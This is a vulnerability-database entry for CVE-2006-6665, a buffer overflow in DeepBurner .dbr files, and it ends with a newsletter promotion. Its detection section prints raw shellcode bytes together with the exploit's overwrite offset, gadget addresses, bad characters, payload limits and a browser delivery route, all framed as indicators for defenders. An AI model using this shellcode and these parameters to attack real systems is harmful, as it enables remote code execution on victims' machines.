cbcvebase.
CVE-2006-6665
published 2006-12-20

CVE-2006-6665: Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag…

PriorityP432medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
29.37%
97.9th percentile
Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag in a dbr file.

Affected

1 ranges
VendorProductVersion rangeFixed in
astonsoftdeepburner<= 1.8.0

Detection & IOCsextracted from sources · hover to see the quote

filenamemsf.dbr
other0x10017928
other0x101021f8
filename.dbr
bytes
\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08\x6b\x48\x82\x83\xeb\xfc\xe2\xf4\xf4\x83\x0c\x82\x08\x6b\xc3\xc7\x34\xe0\x34\x87\x70\x6a\xa7\x09\x47\x73\xc3\xdd\x28\x6a\xa3\xcb\x83\x5f\xc3\x83\xe6\x5a\x88\x1b\xa4\xef\x88\xf6\x0f\xaa\x82\x8f\x09\xa9\xa3\x76\x33\x3f\x6c\x86\x7d\x8e\xc3\xdd\x2c\x6a\xa3\xe4\x83\x67\x03\x09\x57\x77\x49\x69\x83\x77\xc3\x83\xe3\xe2\x14\xa6\x0c\xa8\x79\x42\x6c\xe0\x08\xb2\x8d\xab\x30\x8e\x83\x2b\x44\x09\x78\x77\xe5\x09\x60\x63\xa3\x8b\x83\xeb\xf8\x82\x08\x6b\xc3\xea\x34\x34\x79\x74\x68\x3d\xc1\x7a\x8b\xab\x33\xd2\x60\x9b\xc2\x86\x57\x03\xd0\x7c\x82\x65\x1f\x7d\xef\x08\x29\xee\x6b\x45\x2d\xfa\x6d\x6b\x48\x82
  • The SEH overwrite occurs at offset 272 bytes into the path field of a .dbr file; a short jump of 0x40 bytes is used to skip over the SEH record to reach shellcode.
  • The SEH overwrite uses a pop/pop/ret gadget from BASS.dll (DeepBurner 1.8.0) at 0x10017928; detection should flag .dbr files whose path attribute exceeds 272 bytes.
  • The Metasploit module uses a p/p/r gadget from basswma.dll v2.2.0.3 at 0x101021f8; monitor for DeepBurner loading basswma.dll and crashing on SEH chain traversal.
  • Exploit .dbr files embed XML-encoded shellcode in the path attribute of a <file> tag; look for .dbr files with path attributes containing &#x hex-encoded sequences of length > 272 characters.
  • The DBR file extension is registered to DeepBurner, making drive-by browser delivery possible; monitor browser processes spawning DeepBurner with a .dbr argument from a temp/download directory.
  • Known bad characters for shellcode in this exploit are 0x00, 0x3c (<), 0x3e (>), 0x0a, 0x0d, 0x22 ("), 0x2F (/); IDS rules should look for long runs of non-XML-special bytes in the path attribute.
  • ·The Metasploit module targets versions 1.9.0.228 and 1.8.0; the payload space is limited to 512 bytes with a stack adjustment of -3500 and NOP generation disabled.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.